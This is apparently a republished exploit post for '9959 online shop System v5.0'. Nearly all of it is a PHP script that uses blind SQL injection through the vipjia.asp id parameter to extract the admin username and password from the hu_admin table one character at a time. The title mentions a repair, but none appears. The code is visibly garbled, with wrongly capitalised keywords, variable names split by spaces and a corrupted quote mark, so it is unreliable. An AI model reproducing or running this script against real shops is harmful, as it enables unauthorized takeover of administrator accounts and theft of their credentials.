9959 online shop System v5.0 SQL blind injection vulnerability and repair

Author: stuffy bean,

 

========================================================== ==========================================

<? Php
Print_r ('

+ ------------------------- +

9959 online shop System v5.0
Blind SQL injection exploit by mendou
05
Official Website: www.9959shop.com www.2cto.com

+ ------------------------- +

');

If ($ argc <
2 ){

Print_r ('

+ ------------------------- +

Usage: php
'. $ Argv [0].' host id

Example:

Php
'. $ Argv [0].' localhost id

+ ------------------------- +

');

Exit;

}

Error_reporting (0 );

Ini_set ('max _ execution_time ', 0 );

$ Host =
$ Argv [1];

$ Str =
"Abcdefghijklmnopqrstuvwxyz0123456789 ″;

$ Strlen
= Strlen ($ str );

$ Pid = $ argv [2];

$ N_len =
Lenstr (adminname); // user Length

Echo
"User length:". $ n_len. "\ r \ n ";

Pojie ("adminname", $ n_len); echo "\ r \ n ";

$ P_len =
Lenstr (password); // password length

Echo
"Password length:". $ p_len. "\ r \ n ";

Pojie ("password", $ p_len );

Function
Pojie ($ str1, $ len ){

Global $ host, $ strlen, $ str, $ pid;

For
($ J = 1; $ j <= $ len; $ j ++ ){

For ($ I = 0; $ I <$ strlen;
$ I ++ ){

$ Exp =
"% 20and % 20 (select % 20top % 201% 20mid (". $ str1 .",". $ j. ", 1) % 20 from % 20hu_admin) = '". $ str [$ I]. "'";

$ A =
File_get_contents ('HTTP: // '. $ host.'/user/vipjia. asp? Action = loads & id = '. $ pid. $ exp );

If
(Strpos ($ a, "times") = true ){

Echo
$ Str [$ I]; break;

}

}

}

}

// Judge
User or password length Function

Www.2cto.com function lenstr ($ str ){

Global
$ Host, $ pid;

For ($ I = 1; $ I <= 30; $ I ++ ){

$ Exp =
"% 20and % 20 (select % 20top % 201% 20len (". $ str. ") % 20 from % 20hu_admin) =". $ I;

$ A =
File_get_contents ('HTTP: // '. $ host.'/user/vipjia. asp? Action = loads & id = '. $ pid. $ exp );

If
(Strpos ($ a, "times") = true ){

Return $ I;

}

}

}

?>

========================================================== ==========================================